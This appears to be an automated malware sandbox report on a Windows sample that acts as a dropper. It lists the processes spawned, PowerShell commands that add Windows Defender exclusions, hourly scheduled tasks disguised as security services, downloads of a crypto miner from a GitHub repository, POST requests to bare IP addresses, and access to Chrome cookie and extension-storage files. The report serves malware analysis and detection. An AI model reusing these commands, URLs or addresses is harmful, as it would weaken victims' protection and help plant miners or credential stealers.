Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Aug. 13, 2022, 8:13 p.m. | Aug. 13, 2022, 8:37 p.m. |
-
-
-
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145409
2552 -
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:145410
2764 -
iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2480 CREDAT:210945
2800
-
-
F0geI.exe "C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
2988 -
kukurzka9000.exe "C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe"
2124 -
namdoitntn.exe "C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe"
2240 -
real.exe "C:\Program Files (x86)\Company\NewProduct\real.exe"
2408 -
safert44.exe "C:\Program Files (x86)\Company\NewProduct\safert44.exe"
2500 -
tag.exe "C:\Program Files (x86)\Company\NewProduct\tag.exe"
2652 -
-
-
cmd.exe "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
3988-
chcp.com chcp 1251
4044 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop"
4088 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost"
2468 -
powershell.exe powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData"
3272
-
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3600-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3684
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2632-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3404
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3620-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe"
292
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3316-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1504
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3332-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3832
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
244-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3088
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3856-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3108
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3792-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3340
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1512-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3568
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2312-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe"
2828
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3992-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3756
-
-
cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
3544-
schtasks.exe SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe"
1060
-
-
-
chcp.com chcp 1251
2656 -
winlogson.exe C:\ProgramData\Dllhost\winlogson.exe -c config.json
2120
-
-
-
-
-
ffnameedit.exe "C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe"
2568 -
rawxdev.exe "C:\Program Files (x86)\Company\NewProduct\rawxdev.exe"
2596 -
WW1.exe "C:\Program Files (x86)\Company\NewProduct\WW1.exe"
3096
-
-
explorer.exe C:\Windows\Explorer.EXE
1236
IP Address | Status | Action |
---|---|---|
103.89.90.61 | Active | Moloch |
117.18.232.200 | Active | Moloch |
148.251.234.83 | Active | Moloch |
164.124.101.2 | Active | Moloch |
176.113.115.146 | Active | Moloch |
176.9.247.226 | Active | Moloch |
185.191.229.101 | Active | Moloch |
185.199.110.133 | Active | Moloch |
193.56.146.177 | Active | Moloch |
195.54.170.157 | Active | Moloch |
20.200.245.247 | Active | Moloch |
23.206.175.225 | Active | Moloch |
45.159.248.173 | Active | Moloch |
51.15.55.100 | Active | Moloch |
62.204.41.144 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLS 1.2 192.168.56.103:49258 20.200.245.247:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com | 1e:16:cc:3f:84:2f:65:fc:c0:ab:93:2d:63:8a:c6:4a:95:c9:1b:7a |
TLS 1.2 192.168.56.103:49259 185.199.110.133:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 8f:0e:79:24:71:c5:a7:d2:a7:46:76:30:c1:3c:b7:2a:13:b0:01:b2 |
TLS 1.2 192.168.56.103:49287 20.200.245.247:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=github.com | 1e:16:cc:3f:84:2f:65:fc:c0:ab:93:2d:63:8a:c6:4a:95:c9:1b:7a |
TLS 1.2 192.168.56.103:49248 176.9.247.226:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=uploadgram.me | 0b:46:9f:79:7b:ee:c3:6f:15:5b:37:09:45:b9:6b:65:a1:d8:ee:a8 |
TLS 1.2 192.168.56.103:49289 185.199.110.133:443 |
C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1 | C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io | 8f:0e:79:24:71:c5:a7:d2:a7:46:76:30:c1:3c:b7:2a:13:b0:01:b2 |
TLS 1.2 192.168.56.103:49295 51.15.55.100:14433 |
C=US, O=CloudFlare, Inc., OU=CloudFlare Origin SSL Certificate Authority, L=San Francisco, ST=California | O=CloudFlare, Inc., OU=CloudFlare Origin CA, CN=CloudFlare Origin Certificate | a4:ae:d4:ca:11:61:1f:57:07:59:2e:03:62:44:cf:80:e3:76:5d:42 |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
section | CODE |
section | DATA |
section | BSS |
packer | BobSoft Mini Delphi -> BoB / BobSoft |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.159.248.173/1571 | ||||||
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://45.159.248.173/3137953174.zip | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://193.56.146.177/ | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header, Connection to IP address | suspicious_request | POST http://45.159.248.173/ | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://dl.uploadgram.me/62f0d0bc546feh?raw | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://github.com/BardBax/xyi/blob/main/Task24Watch.exe?raw=true | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://github.com/BardBax/xyi/raw/main/Task24Watch.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://raw.githubusercontent.com/BardBax/xyi/main/Task24Watch.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://github.com/BardBax/xyi/blob/main/xmrig.exe?raw=true | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://github.com/BardBax/xyi/raw/main/xmrig.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET https://raw.githubusercontent.com/BardBax/xyi/main/xmrig.exe |
request | GET http://45.159.248.173/1571 |
request | GET http://45.159.248.173/3137953174.zip |
request | POST http://193.56.146.177/ |
request | POST http://45.159.248.173/ |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml |
request | GET https://dl.uploadgram.me/62f0d0bc546feh?raw |
request | GET https://github.com/BardBax/xyi/blob/main/Task24Watch.exe?raw=true |
request | GET https://github.com/BardBax/xyi/raw/main/Task24Watch.exe |
request | GET https://raw.githubusercontent.com/BardBax/xyi/main/Task24Watch.exe |
request | GET https://github.com/BardBax/xyi/blob/main/xmrig.exe?raw=true |
request | GET https://github.com/BardBax/xyi/raw/main/xmrig.exe |
request | GET https://raw.githubusercontent.com/BardBax/xyi/main/xmrig.exe |
request | POST http://193.56.146.177/ |
request | POST http://45.159.248.173/ |
ip | 103.89.90.61 |
ip | 176.113.115.146 |
ip | 185.191.229.101 |
ip | 195.54.170.157 |
ip | 51.15.55.100 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\_locales\nl\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\4\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\_locales\hi\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\_locales\hu\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\_locales\is\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\it\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobl\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\03019df3fd85a69a8ebd1facc6da9ba73e469774fe77f579fc5a08b8328c1d6b.sth\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\sk\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\hu\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\IndexedDB\chrome-extension_oeljdldpnmdbchonielidgobddffflal_0.indexeddb.leveldb\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\tr\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\8620.824.0.0_0\_locales\sk\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.31.0_0\manifest.fingerprint\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOCK\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid\CURRENT |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\_locales\da\messages.json\Network\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\fil\messages.json\Network\Cookies |
file | C:\Program Files (x86)\Company\NewProduct\tag.exe |
file | C:\Program Files (x86)\Company\NewProduct\jshainx.exe |
file | C:\Program Files (x86)\Company\NewProduct\WW1.exe |
file | C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe |
file | C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe |
file | C:\Program Files (x86)\Company\NewProduct\real.exe |
file | C:\ProgramData\Dllhost\winlogson.exe |
file | C:\Program Files (x86)\Company\NewProduct\F0geI.exe |
file | C:\ProgramData\Dllhost\dllhost.exe |
file | C:\Program Files (x86)\Company\NewProduct\safert44.exe |
file | C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe |
file | C:\Program Files (x86)\Company\NewProduct\rawxdev.exe |
file | C:\Users\test22\AppData\Local\Temp\MinecraftForge.exe |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk |
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Snipping Tool.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office 2013\Word 2013.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip\7-Zip File Manager.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Calculator.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Paint.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\displayswitch.lnk |
file | C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk |
file | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Sticky Notes.lnk |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesService_bk1481" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostService_bk7066" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
file | C:\Program Files (x86)\Company\NewProduct\F0geI.exe |
file | C:\Program Files (x86)\Company\NewProduct\kukurzka9000.exe |
file | C:\Program Files (x86)\Company\NewProduct\namdoitntn.exe |
file | C:\Program Files (x86)\Company\NewProduct\real.exe |
file | C:\Program Files (x86)\Company\NewProduct\safert44.exe |
file | C:\Program Files (x86)\Company\NewProduct\tag.exe |
file | C:\Program Files (x86)\Company\NewProduct\jshainx.exe |
file | C:\Program Files (x86)\Company\NewProduct\ffnameedit.exe |
file | C:\Program Files (x86)\Company\NewProduct\rawxdev.exe |
file | C:\Program Files (x86)\Company\NewProduct\WW1.exe |
file | C:\Users\test22\AppData\Local\Temp\MinecraftForge.exe |
file | C:\ProgramData\Dllhost\winlogson.exe |
file | C:\Users\test22\AppData\Local\Temp\MinecraftForge.exe |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /C chcp 1251 & powershell -Command Add-MpPreference -ExclusionPath "$ENV:USERPROFILE\Desktop" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\Dllhost" & powershell -Command Add-MpPreference -ExclusionPath "C:\ProgramData\SystemData" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableService_bk579" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesService_bk406" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
cmdline | chcp 1251 |
cmdline | SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" |
